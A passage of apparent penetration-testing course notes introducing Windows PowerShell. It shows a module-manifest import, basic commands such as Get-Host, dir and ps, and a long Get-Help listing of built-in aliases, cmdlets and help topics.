Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 7/11/2017 12:07 PM 5246 Show-AdvancedScript.psd1
-a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1
PS C:\Users\Administrator\Desktop\19>
```
- Testing the ```Manifest Module```
```PowerShell
PS C:\Users\Administrator\Desktop\19> Test-ModuleManifest .\Show-AdvancedScript.psd1
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence}
PS C:\Users\Administrator\Desktop\19>
```
- Using the manifest
- Importing the ```module```
```PowerShell
PS C:\Users\Administrator\Desktop\19> Import-Module .\Show-AdvancedScript.psd1 -Verbose
VERBOSE: Loading module from path 'C:\Users\Administrator\Desktop\19\Show-AdvancedScript.psd1'.
VERBOSE: Importing function 'Show-AdvancedScript'.
VERBOSE: Importing function 'Test-FileExistence'.
PS C:\Users\Administrator\Desktop\19>
```
- Importing the ```module``` with the ```Version```
```PowerShell
PS C:\Users\Administrator\Desktop\19> Import-Module .\Show-AdvancedScript.psd1 -Version 1.0
```
================================================
FILE: 2-Introduction-to-Powershell.md
================================================
#### 2. Introduction to Powershell
###### [PowerShell](https://technet.microsoft.com/en-us/library/bb978526.aspx)
- Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration.
- Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows
- A powerful shell and scripting language already present on the most general targets in a pen test – Windows computers.
- Less dependence on Metasploit and *nix based scripting.
- Stick to PowerShell v2 as this is the version available on most of the targets (default on Windows 7 and Server 2008 R2)
- Provides access to almost everything on a Windows platform which could be useful for us as attackers.
- Easy to learn and really powerful.
- Based on .Net framework and is tightly integrated with Windows.
- Trusted by the countermeasures and system administrators.
- Get ```powershell version```
```Powershell
PS C:\Users\Windows-32> Get-Host
Name : ConsoleHost
Version : 2.0
InstanceId : 648eccf6-c720-415f-af58-3a94b395097a
UI : System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture : en-US
CurrentUICulture : en-US
PrivateData : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
IsRunspacePushed : False
Runspace : System.Management.Automation.Runspaces.LocalRunspace
PS C:\Users\Windows-32>
```
- ```Directory Listing```
```Powershell
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/13/2009 7:37 PM PerfLogs
d-r-- 5/28/2017 2:21 PM Program Files
d-r-- 5/28/2017 11:33 AM Users
d---- 5/28/2017 2:21 PM Windows
-a--- 6/10/2009 2:42 PM 24 autoexec.bat
-a--- 6/10/2009 2:42 PM 10 config.sys
PS C:\>
```
```Powershell
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/13/2009 7:37 PM PerfLogs
d-r-- 5/28/2017 2:21 PM Program Files
d-r-- 5/28/2017 11:33 AM Users
d---- 5/28/2017 2:21 PM Windows
-a--- 6/10/2009 2:42 PM 24 autoexec.bat
-a--- 6/10/2009 2:42 PM 10 config.sys
PS C:\>
```
- ```Process Listing```
```Powershell
PS C:\> ps
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
125 5 14936 13560 43 996 audiodg
51 3 1572 4648 46 0.02 2588 conhost
496 5 1092 2740 33 344 csrss
190 6 1060 3344 31 400 csrss
70 4 980 3584 40 0.03 300 dwm
740 23 25336 34964 169 1.34 356 explorer
0 0 0 12 0 0 Idle
41 3 1656 3488 52 0.00 332 jusched
758 13 2804 7792 36 492 lsass
152 4 1048 2684 14 500 lsm
332 10 35048 34128 167 0.43 2580 powershell
586 13 11612 7032 81 1180 SearchIndexer
234 9 4412 7440 39 484 services
29 1 260 712 4 268 smss
302 10 4384 8316 58 1332 spoolsv
150 4 1844 6540 29 1516 sppsvc
358 7 2516 6156 35 608 svchost
261 8 2064 4760 26 720 svchost
506 12 13364 13024 74 772 svchost
563 14 18352 25724 86 892 svchost
1014 29 13012 21836 102 932 svchost
534 19 6176 10936 52 1100 svchost
421 14 7660 9644 56 1228 svchost
328 26 7852 9072 42 1368 svchost
377 17 5236 10136 69 1460 svchost
101 7 1096 3828 25 1820 svchost
352 39 7232 9140 63 2364 svchost
534 0 44 540 2 4 System
153 8 2120 4836 40 0.03 2028 taskhost
117 5 1428 3924 44 668 VBoxService
143 6 1320 4740 62 0.04 1612 VBoxTray
89 6 952 3200 33 392 wininit
120 5 1600 4468 39 440 winlogon
113 4 1796 4452 27 2524 WmiPrvSE
469 16 7412 19308 108 2088 wmpnetwk
PS C:\>
```
- ```Powershell help system```
```Powershell
PS C:\> Get-Help
TOPIC
Get-Help
SHORT DESCRIPTION
Displays help about Windows PowerShell cmdlets and concepts.
LONG DESCRIPTION
SYNTAX
get-help {<CmdletName> | <TopicName>}
help {<CmdletName> | <TopicName>}
<CmdletName> -?
"Get-help" and "-?" display help on one page.
"Help" displays help on multiple pages.
Examples:
get-help get-process : Displays help about the Get-Process cmdlet.
get-help about_signing : Displays help about signing scripts.
help where-object : Displays help about the Where-Object cmdlet.
help about_foreach : Displays help about foreach loops in PowerShell.
set-service -? : Displays help about the Set-Service cmdlet.
You can use wildcard characters in the help commands (not with -?).
If multiple help topics match, PowerShell displays a list of matching
topics. If only one help topic matches, PowerShell displays the topic.
Examples:
get-help * : Displays all help topics.
get-help get-* : Displays topics that begin with get-.
help *object* : Displays topics with "object" in the name.
get-help about* : Displays all conceptual topics.
For information about wildcards, type:
get-help about_wildcard
REMARKS
To learn about Windows PowerShell, read the following help topics:
get-command : Gets information about cmdlets from the cmdlet code.
get-member : Gets the properties and methods of an object.
where-object : Filters object properties.
about_object : Explains the use of objects in Windows PowerShell.
about_remote : Tells how to run commands on remote computers.
Conceptual help files are named "about_<topic>", such as:
about_regular_expression.
The names of conceptual help files must be entered in English
even on non-English versions of Windows PowerShell.
The help commands also display the aliases of the cmdlets. These
are alternate names or nicknames that are often easier to type.
For example, the alias for the Invoke-Command cmdlet is "remote".
To get the aliases, type:
get-alias
PS C:\>
```
- Get all ```powershell help topics```
```Powershell
PS C:\> Get-Help *
Name Category Synopsis
---- -------- --------
ac Alias Add-Content
asnp Alias Add-PSSnapin
clc Alias Clear-Content
cli Alias Clear-Item
clp Alias Clear-ItemProperty
clv Alias Clear-Variable
compare Alias Compare-Object
cpi Alias Copy-Item
cpp Alias Copy-ItemProperty
cvpa Alias Convert-Path
dbp Alias Disable-PSBreakpoint
diff Alias Compare-Object
ebp Alias Enable-PSBreakpoint
epal Alias Export-Alias
epcsv Alias Export-Csv
fc Alias Format-Custom
fl Alias Format-List
foreach Alias ForEach-Object
% Alias ForEach-Object
ft Alias Format-Table
fw Alias Format-Wide
gal Alias Get-Alias
gbp Alias Get-PSBreakpoint
gc Alias Get-Content
gci Alias Get-ChildItem
gcm Alias Get-Command
gdr Alias Get-PSDrive
gcs Alias Get-PSCallStack
ghy Alias Get-History
gi Alias Get-Item
gl Alias Get-Location
gm Alias Get-Member
gmo Alias Get-Module
gp Alias Get-ItemProperty
gps Alias Get-Process
group Alias Group-Object
gsv Alias Get-Service
gsnp Alias Get-PSSnapin
gu Alias Get-Unique
gv Alias Get-Variable
gwmi Alias Get-WmiObject
iex Alias Invoke-Expression
ihy Alias Invoke-History
ii Alias Invoke-Item
ipmo Alias Import-Module
iwmi Alias Invoke-WmiMethod
ipal Alias Import-Alias
ipcsv Alias Import-Csv
measure Alias Measure-Object
mi Alias Move-Item
mp Alias Move-ItemProperty
nal Alias New-Alias
ndr Alias New-PSDrive
ni Alias New-Item
nv Alias New-Variable
nmo Alias New-Module
oh Alias Out-Host
ogv Alias Out-GridView
ise Alias powershell_ise.exe
rbp Alias Remove-PSBreakpoint
rdr Alias Remove-PSDrive
ri Alias Remove-Item
rni Alias Rename-Item
rnp Alias Rename-ItemProperty
rp Alias Remove-ItemProperty
rmo Alias Remove-Module
rsnp Alias Remove-PSSnapin
rv Alias Remove-Variable
rwmi Alias Remove-WmiObject
rvpa Alias Resolve-Path
sal Alias Set-Alias
sasv Alias Start-Service
sbp Alias Set-PSBreakpoint
sc Alias Set-Content
select Alias Select-Object
si Alias Set-Item
sl Alias Set-Location
swmi Alias Set-WmiInstance
sleep Alias Start-Sleep
sort Alias Sort-Object
sp Alias Set-ItemProperty
saps Alias Start-Process
start Alias Start-Process
spps Alias Stop-Process
spsv Alias Stop-Service
sv Alias Set-Variable
tee Alias Tee-Object
where Alias Where-Object
? Alias Where-Object
write Alias Write-Output
cat Alias Get-Content
cd Alias Set-Location
clear Alias Clear-Host
cp Alias Copy-Item
h Alias Get-History
history Alias Get-History
kill Alias Stop-Process
lp Alias Out-Printer
ls Alias Get-ChildItem
man Alias help
mount Alias New-PSDrive
md Alias mkdir
mv Alias Move-Item
popd Alias Pop-Location
ps Alias Get-Process
pushd Alias Push-Location
pwd Alias Get-Location
r Alias Invoke-History
rm Alias Remove-Item
rmdir Alias Remove-Item
echo Alias Write-Output
cls Alias Clear-Host
chdir Alias Set-Location
copy Alias Copy-Item
del Alias Remove-Item
dir Alias Get-ChildItem
erase Alias Remove-Item
move Alias Move-Item
rd Alias Remove-Item
ren Alias Rename-Item
set Alias Set-Variable
type Alias Get-Content
icm Alias Invoke-Command
clhy Alias Clear-History
gjb Alias Get-Job
rcjb Alias Receive-Job
rjb Alias Remove-Job
sajb Alias Start-Job
spjb Alias Stop-Job
wjb Alias Wait-Job
nsn Alias New-PSSession
gsn Alias Get-PSSession
rsn Alias Remove-PSSession
ipsn Alias Import-PSSession
epsn Alias Export-PSSession
etsn Alias Enter-PSSession
exsn Alias Exit-PSSession
Get-WinEvent Cmdlet Gets events from event logs and event tracing log files on local and rem...
Get-Counter Cmdlet Gets performance counter data from local and remote computers.
Import-Counter Cmdlet Imports performance counter log files (.blg, .csv, .tsv) and creates the...
Export-Counter Cmdlet The Export-Counter cmdlet takes PerformanceCounterSampleSet objects and ...
Disable-WSManCredSSP Cmdlet Disables Credential Security Service Provider (CredSSP) authentication o...
Enable-WSManCredSSP Cmdlet Enables Credential Security Service Provider (CredSSP) authentication on...
Get-WSManCredSSP Cmdlet Gets the Credential Security Service Provider-related configuration for ...
Set-WSManQuickConfig Cmdlet Configures the local computer for remote management.
Test-WSMan Cmdlet Tests whether the WinRM service is running on a local or remote computer.
Invoke-WSManAction Cmdlet Invokes an action on the object that is specified by the Resource URI an...
Connect-WSMan Cmdlet Connects to the WinRM service on a remote computer.
Disconnect-WSMan Cmdlet Disconnects the client from the WinRM service on a remote computer.
Get-WSManInstance Cmdlet Displays management information for a resource instance specified by a R...
Set-WSManInstance Cmdlet Modifies the management information that is related to a resource.
Remove-WSManInstance Cmdlet Deletes a management resource instance.
New-WSManInstance Cmdlet Creates a new instance of a management resource.
New-WSManSessionOption Cmdlet Creates a WS-Management session option hash table to use as input parame...
Get-Command Cmdlet Gets basic information about cmdlets and other elements of Windows Power...
Get-Help Cmdlet Displays information about Windows PowerShell commands and concepts.
Get-History Cmdlet Gets a list of the commands entered during the current session.
Invoke-History Cmdlet Runs commands from the session history.
Add-History Cmdlet Appends entries to the session history.
Clear-History Cmdlet Deletes entries from the command history.
Register-PSSessionConfiguration Cmdlet Creates and registers a new session configuration.
Unregister-PSSessionConfiguration Cmdlet Deletes registered session configurations from the computer.
Get-PSSessionConfiguration Cmdlet Gets the registered session configurations on the computer.
Set-PSSessionConfiguration Cmdlet Changes the properties of a registered session configuration.
Enable-PSSessionConfiguration Cmdlet Enables the session configurations on the local computer.
Disable-PSSessionConfiguration Cmdlet Denies access to the session configurations on the local computer.
Enable-PSRemoting Cmdlet Configures the computer to receive remote commands.
Invoke-Command Cmdlet Runs commands on local and remote computers.
New-PSSession Cmdlet Creates a persistent connection to a local or remote computer.
Get-PSSession Cmdlet Gets the Windows PowerShell sessions (PSSessions) in the current session.
Remove-PSSession Cmdlet Closes one or more Windows PowerShell sessions (PSSessions).
Start-Job Cmdlet Starts a Windows PowerShell background job.
Get-Job Cmdlet Gets Windows PowerShell background jobs that are running in the current ...
Receive-Job Cmdlet Gets the results of the Windows PowerShell background jobs in the curren...
Stop-Job Cmdlet Stops a Windows PowerShell background job.
Wait-Job Cmdlet Suppresses the command prompt until one or all of the Windows PowerShell...
Remove-Job Cmdlet Deletes a Windows PowerShell background job.
Enter-PSSession Cmdlet Starts an interactive session with a remote computer.
Exit-PSSession Cmdlet Ends an interactive session with a remote computer.
New-PSSessionOption Cmdlet Creates an object that contains advanced options for a PSSession.
ForEach-Object Cmdlet Performs an operation against each of a set of input objects.
Where-Object Cmdlet Creates a filter that controls which objects will be passed along a comm...
Set-PSDebug Cmdlet Turns script debugging features on and off, sets the trace level, and to...
Set-StrictMode Cmdlet Establishes and enforces coding rules in expressions, scripts, and scrip...
New-Module Cmdlet Creates a new dynamic module that exists only in memory.
Import-Module Cmdlet Adds modules to the current session.
Export-ModuleMember Cmdlet Specifies the module members that are exported.
Get-Module Cmdlet Gets the modules that have been imported or that can be imported into th...
Remove-Module Cmdlet Removes modules from the current session.
New-ModuleManifest Cmdlet Creates a new module manifest.
Test-ModuleManifest Cmdlet Verifies that a module manifest file accurately describes the contents o...
Add-PSSnapin Cmdlet Adds one or more Windows PowerShell snap-ins to the current session.
Remove-PSSnapin Cmdlet Removes Windows PowerShell snap-ins from the current session.
Get-PSSnapin Cmdlet Gets the Windows PowerShell snap-ins on the computer.
Export-Console Cmdlet Exports the names of snap-ins in the current session to a console file.
Format-List Cmdlet Formats the output as a list of properties in which each property appear...
Format-Custom Cmdlet Uses a customized view to format the output.
Format-Table Cmdlet Formats the output as a table.
Format-Wide Cmdlet Formats objects as a wide table that displays only one property of each ...
Out-Null Cmdlet Deletes output instead of sending it to the console.
Out-Default Cmdlet Sends the output to the default formatter and to the default output cmdlet.
Out-Host Cmdlet Sends output to the command line.
Out-File Cmdlet Sends output to a file.
Out-Printer Cmdlet Sends output to a printer.
Out-String Cmdlet Sends objects to the host as a series of strings.
Out-GridView Cmdlet Sends output to an interactive table in a separate window.
Get-FormatData Cmdlet Gets the formatting data in the current session.
Export-FormatData Cmdlet Saves formatting data from the current session in a formatting file.
Register-ObjectEvent Cmdlet Subscribes to the events that are generated by a Microsoft .NET Framewor...
Register-EngineEvent Cmdlet Subscribes to events that are generated by the Windows PowerShell engine...
Wait-Event Cmdlet Waits until a particular event is raised before continuing to run.
Get-Event Cmdlet Gets the events in the event queue.
Remove-Event Cmdlet Deletes events from the event queue.
Get-EventSubscriber Cmdlet Gets the event subscribers in the current session.
Unregister-Event Cmdlet Cancels an event subscription.
New-Event Cmdlet Creates a new event.
Add-Member Cmdlet Adds a user-defined custom member to an instance of a Windows PowerShell...
Add-Type Cmdlet Adds a Microsoft .NET Framework type (a class) to a Windows PowerShell s...
Compare-Object Cmdlet Compares two sets of objects.
ConvertTo-Html Cmdlet Converts Microsoft .NET Framework objects into HTML that can be displaye...
ConvertFrom-StringData Cmdlet Converts a string containing one or more key/value pairs to a hash table.
Export-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat...
Import-CSV Cmdlet Converts object properties in a comma-separated value (CSV) file into CS...
ConvertTo-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat...
ConvertFrom-CSV Cmdlet Converts object properties in comma-separated value (CSV) format into CS...
Export-Alias Cmdlet Exports information about currently defined aliases to a file.
Invoke-Expression Cmdlet Runs commands or expressions on the local computer.
Get-Alias Cmdlet Gets the aliases for the current session.
Get-Culture Cmdlet Gets the current culture set in the operating system.
Get-Date Cmdlet Gets the current date and time.
Get-Host Cmdlet Gets an object that represents the current host program. And, displays W...
Get-Member Cmdlet Gets the properties and methods of objects.
Get-Random Cmdlet Gets a random number, or selects objects randomly from a collection.
Get-UICulture Cmdlet Gets the current user interface (UI) culture settings in the operating s...
Get-Unique Cmdlet Returns the unique items from a sorted list.
Export-PSSession Cmdlet Imports commands from another session and saves them in a Windows PowerS...
Import-PSSession Cmdlet Imports commands from another session into the current session.
Import-Alias Cmdlet Imports an alias list from a file.
Import-LocalizedData Cmdlet Imports language-specific data into scripts and functions based on the U...
Select-String Cmdlet Finds text in strings and files.
Measure-Object Cmdlet Calculates the numeric properties of objects, and the characters, words,...
New-Alias Cmdlet Creates a new alias.
New-TimeSpan Cmdlet Creates a TimeSpan object.
Read-Host Cmdlet Reads a line of input from the console.
Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...
Set-Date Cmdlet Changes the system time on the computer to a time that you specify.
Start-Sleep Cmdlet Suspends the activity in a script or session for the specified period of...
Tee-Object Cmdlet Saves command output in a file or variable, and displays it in the console.
Measure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets.
Update-List Cmdlet Adds items to and removes items from a property value that contains a co...
Update-TypeData Cmdlet Updates the current extended type configuration by reloading the *.types...
Update-FormatData Cmdlet Updates the formatting data in the current session.
Write-Host Cmdlet Writes customized output to a host.
Write-Progress Cmdlet Displays a progress bar within a Windows PowerShell command window.
New-Object Cmdlet Creates an instance of a Microsoft .NET Framework or COM object.
Select-Object Cmdlet Selects specified properties of an object or set of objects. It can also...
Group-Object Cmdlet Groups objects that contain the same value for specified properties.
Sort-Object Cmdlet Sorts objects by property values.
Get-Variable Cmdlet Gets the variables in the current console.
New-Variable Cmdlet Creates a new variable.
Set-Variable Cmdlet Sets the value of a variable. Creates the variable if one with the reque...
Remove-Variable Cmdlet Deletes a variable and its value.
Clear-Variable Cmdlet Deletes the value of a variable.
Export-Clixml Cmdlet Creates an XML-based representation of an object or objects and stores i...
Import-Clixml Cmdlet Imports a CLIXML file and creates corresponding objects within Windows P...
ConvertTo-XML Cmdlet Creates an XML-based representation of an object.
Select-XML Cmdlet Finds text in an XML string or document.
Write-Debug Cmdlet Writes a debug message to the console.
Write-Verbose Cmdlet Writes text to the verbose message stream.
Write-Warning Cmdlet Writes a warning message.
Write-Error Cmdlet Writes an object to the error stream.
Write-Output Cmdlet Sends the specified objects to the next command in the pipeline. If the ...
Set-PSBreakpoint Cmdlet Sets a breakpoint on a line, command, or variable.
Get-PSBreakpoint Cmdlet Gets the breakpoints that are set in the current session.
Remove-PSBreakpoint Cmdlet Deletes breakpoints from the current console.
Enable-PSBreakpoint Cmdlet Enables the breakpoints in the current console.
Disable-PSBreakpoint Cmdlet Disables the breakpoints in the current console.
Get-PSCallStack Cmdlet Displays the current call stack.
Send-MailMessage Cmdlet Sends an e-mail message.
Get-TraceSource Cmdlet Gets the Windows PowerShell components that are instrumented for tracing.
Set-TraceSource Cmdlet Configures, starts, and stops a trace of Windows PowerShell components.
Trace-Command Cmdlet Configures and starts a trace of the specified expression or command.
Start-Transcript Cmdlet Creates a record of all or part of a Windows PowerShell session in a tex...
Stop-Transcript Cmdlet Stops a transcript.
Add-Content Cmdlet Adds content to the specified items, such as adding words to a file.
Clear-Content Cmdlet Deletes the contents of an item, such as deleting the text from a file, ...
Clear-ItemProperty Cmdlet Deletes the value of a property but does not delete the property.
Join-Path Cmdlet Combines a path and a child path into a single path. The provider suppli...
Convert-Path Cmdlet Converts a path from a Windows PowerShell path to a Windows PowerShell p...
Copy-ItemProperty Cmdlet Copies a property and value from a specified location to another location.
Get-EventLog Cmdlet Gets the events in an event log, or a list of the event logs, on the loc...
Clear-EventLog Cmdlet Deletes all entries from specified event logs on the local or remote com...
Write-EventLog Cmdlet Writes an event to an event log.
Limit-EventLog Cmdlet Sets the event log properties that limit the size of the event log and t...
Show-EventLog Cmdlet Displays the event logs of the local or a remote computer in Event Viewer.
New-EventLog Cmdlet Creates a new event log and a new event source on a local or remote comp...
Remove-EventLog Cmdlet Deletes an event log or unregisters an event source.
Get-ChildItem Cmdlet Gets the items and child items in one or more specified locations.
Get-Content Cmdlet Gets the content of the item at the specified location.
Get-ItemProperty Cmdlet Gets the properties of a specified item.
Get-WmiObject Cmdlet Gets instances of Windows Management Instrumentation (WMI) classes or in...
Invoke-WmiMethod Cmdlet Calls Windows Management Instrumentation (WMI) methods.
Move-ItemProperty Cmdlet Moves a property from one location to another.
Get-Location Cmdlet Gets information about the current working location.
Set-Location Cmdlet Sets the current working location to a specified location.
Push-Location Cmdlet Adds the current location to the top of a list of locations (a "stack").
Pop-Location Cmdlet Changes the current location to the location most recently pushed onto t...
New-PSDrive Cmdlet Creates a Windows PowerShell drive in the current session.
Remove-PSDrive Cmdlet Removes a Windows PowerShell drive from its location.
Get-PSDrive Cmdlet Gets the Windows PowerShell drives in the current session.
Get-Item Cmdlet Gets the item at the specified location.
New-Item Cmdlet Creates a new item.
Set-Item Cmdlet Changes the value of an item to the value specified in the command.
Remove-Item Cmdlet Deletes the specified items.
Move-Item Cmdlet Moves an item from one location to another.
Rename-Item Cmdlet Renames an item in a Windows PowerShell provider namespace.
Copy-Item Cmdlet Copies an item from one location to another within a namespace.
Clear-Item Cmdlet Deletes the contents of an item, but does not delete the item.
Invoke-Item Cmdlet Performs the default action on the specified item.
Get-PSProvider Cmdlet Gets information about the specified Windows PowerShell provider.
New-ItemProperty Cmdlet Creates a new property for an item and sets its value. For example, you ...
Split-Path Cmdlet Returns the specified part of a path.
Test-Path Cmdlet Determines whether all elements of a path exist.
Get-Process Cmdlet Gets the processes that are running on the local computer or a remote co...
Stop-Process Cmdlet Stops one or more running processes.
Wait-Process Cmdlet Waits for the processes to be stopped before accepting more input.
Debug-Process Cmdlet Debugs one or more processes running on the local computer.
Start-Process Cmdlet Starts one or more processes on the local computer.
Remove-ItemProperty Cmdlet Deletes the property and its value from an item.
Remove-WmiObject Cmdlet Deletes an instance of an existing Windows Management Instrumentation (W...
Rename-ItemProperty Cmdlet Renames a property of an item.
Register-WmiEvent Cmdlet Subscribes to a Windows Management Instrumentation (WMI) event.
Resolve-Path Cmdlet Resolves the wildcard characters in a path, and displays the path contents.
Get-Service Cmdlet Gets the services on a local or remote computer.
Stop-Service Cmdlet Stops one or more running services.
Start-Service Cmdlet Starts one or more stopped services.
Suspend-Service Cmdlet Suspends (pauses) one or more running services.
Resume-Service Cmdlet Resumes one or more suspended (paused) services.
Restart-Service Cmdlet Stops and then starts one or more services.
Set-Service Cmdlet Starts, stops, and suspends a service, and changes its properties.
New-Service Cmdlet Creates a new Windows service.
Set-Content Cmdlet Writes or replaces the content in an item with new content.
Set-ItemProperty Cmdlet Creates or changes the value of a property of an item.
Set-WmiInstance Cmdlet Creates or updates an instance of an existing Windows Management Instrum...
Get-Transaction Cmdlet Gets the current (active) transaction.
Start-Transaction Cmdlet Starts a transaction.
Complete-Transaction Cmdlet Commits the active transaction.
Undo-Transaction Cmdlet Rolls back the active transaction.
Use-Transaction Cmdlet Adds the script block to the active transaction.
New-WebServiceProxy Cmdlet Creates a Web service proxy object that lets you use and manage the Web ...
Get-HotFix Cmdlet Gets the hotfixes that have been applied to the local and remote computers.
Test-Connection Cmdlet Sends ICMP echo request packets ("pings") to one or more computers.
Enable-ComputerRestore Cmdlet Enables the System Restore feature on the specified file system drive.
Disable-ComputerRestore Cmdlet Disables the System Restore feature on the specified file system drive.
Checkpoint-Computer Cmdlet Creates a system restore point on the local computer.
Get-ComputerRestorePoint Cmdlet Gets the restore points on the local computer.
Restart-Computer Cmdlet Restarts ("reboots") the operating system on local and remote computers.
Stop-Computer Cmdlet Stops (shuts down) local and remote computers.
Restore-Computer Cmdlet Starts a system restore on the local computer.
Add-Computer Cmdlet Add the local computer to a domain or workgroup.
Remove-Computer Cmdlet Remove the local computer from a workgroup or domain.
Test-ComputerSecureChannel Cmdlet Tests and repairs the secure channel between the local computer and its ...
Reset-ComputerMachinePassword Cmdlet Resets the machine account password for the computer.
Get-Acl Cmdlet Gets the security descriptor for a resource, such as a file or registry ...
Set-Acl Cmdlet Changes the security descriptor of a specified resource, such as a file ...
Get-PfxCertificate Cmdlet Gets information about .pfx certificate files on the computer.
Get-Credential Cmdlet Gets a credential object based on a user name and password.
Get-ExecutionPolicy Cmdlet Gets the execution policies for the current session.
Set-ExecutionPolicy Cmdlet Changes the user preference for the Windows PowerShell execution policy.
Get-AuthenticodeSignature Cmdlet Gets information about the Authenticode signature in a file.
Set-AuthenticodeSignature Cmdlet Adds an Authenticode signature to a Windows PowerShell script or other f...
ConvertFrom-SecureString Cmdlet Converts a secure string into an encrypted standard string.
ConvertTo-SecureString Cmdlet Converts encrypted standard strings to secure strings. It can also conve...
WSMan Provider Provides access to Web Services for Management (WS-Management) configura...
Alias Provider Provides access to the Windows PowerShell aliases and the values that th...
Environment Provider Provides access to the Windows environment variables.
FileSystem Provider Provides access to files and directories.
Function Provider Provides access to the functions defined in Windows PowerShell.
Registry Provider Provides access to the system registry keys and values from Windows Powe...
Variable Provider Provides access to the Windows PowerShell variables and to their values.
Certificate Provider Provides access to X.509 certificate stores and certificates from within...
about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows
about_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell.
about_arrays HelpFile Describes a compact data structure for storing data elements.
about_Assignment_Operators HelpFile Describes how to use operators to assign values to variables.
about_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell.
about_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While,
about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.
about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.
about_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts.
about_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet.
about_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell.
about_Continue HelpFile Describes how the Continue statement immediately returns the program flow
about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell
about_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only
about_debuggers HelpFile Describes the Windows PowerShell debugger.
about_do HelpFile Runs a statement list one or more times, subject to a While or Until
about_environment_variables HelpFile Describes how to access Windows environment variables in Windows
about_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains
about_eventlogs HelpFile Windows PowerShell creates a Windows event log that is
about_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains
about_For HelpFile Describes a language command you can use to run statements based on a
about_Foreach HelpFile Describes a language command you can use to traverse all the items in a
about_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display
about_functions HelpFile Describes how to create and use functions in Windows PowerShell.
about_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets.
about_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use
about_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare
about_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a
about_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell.
about_History HelpFile Describes how to retrieve and run commands in the command history.
about_If HelpFile Describes a language command you can use to run statement lists based
about_jobs HelpFile Provides information about how Windows PowerShell background jobs run a
about_job_details HelpFile Provides details about background jobs on local and remote computers.
about_join HelpFile Describes how the join operator (-join) combines multiple strings into a
about_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language.
about_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt.
about_locations HelpFile Describes how to access items from the working location in Windows
about_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell.
about_methods HelpFile Describes how to use methods to perform actions on objects in Windows
about_modules HelpFile Explains how to install, import, and use Windows PowerShell modules.
about_objects HelpFile Provides essential information about objects in Windows PowerShell.
about_operators HelpFile Describes the operators that are supported by Windows PowerShell.
about_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell.
about_Parsing HelpFile Describes how Windows PowerShell parses commands.
about_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell.
about_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell
about_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell
about_profiles HelpFile Describes how to create and use a Windows PowerShell profile.
about_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom
about_properties HelpFile Describes how to use object properties in Windows PowerShell.
about_providers HelpFile Describes how Windows PowerShell providers provide access to data and
about_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to
about_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the
about_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them.
about_Quoting_Rules HelpFile Describes rules for using single and double quotation marks
about_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files.
about_Ref HelpFile Describes how to create and use a reference variable type.
about_regular_expressions HelpFile Describes regular expressions in Windows PowerShell.
about_remote HelpFile Describes how to run remote commands in Windows PowerShell.
about_remote_FAQ HelpFile Contains questions and answers about running remote commands
about_remote_jobs HelpFile Describes how to run background jobs on remote computers.
about_remote_output HelpFile Describes how to interpret and format the output of remote commands.
about_remote_requirements HelpFile Describes the system requirements and configuration requirements for
about_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell.
about_requires HelpFile Prevents a script from running by requiring the specified snap-ins and
about_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they
about_Return HelpFile Exits the current scope, which can be a function, script, or script block.
about_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set
about_scripts HelpFile Describes how to write and run scripts in Windows PowerShell.
about_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in
about_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell...
about_Session_Configurations HelpFile Describes session configurations, which determine the users who can
about_Signing HelpFile Explains to how sign scripts so that they comply with the Windows
about_Special_Characters HelpFile Describes the special characters that you can use to control how
about_split HelpFile Explains how to use the split operator to split one or more strings into
about_Switch HelpFile Explains how to use a switch to handle multiple If statements.
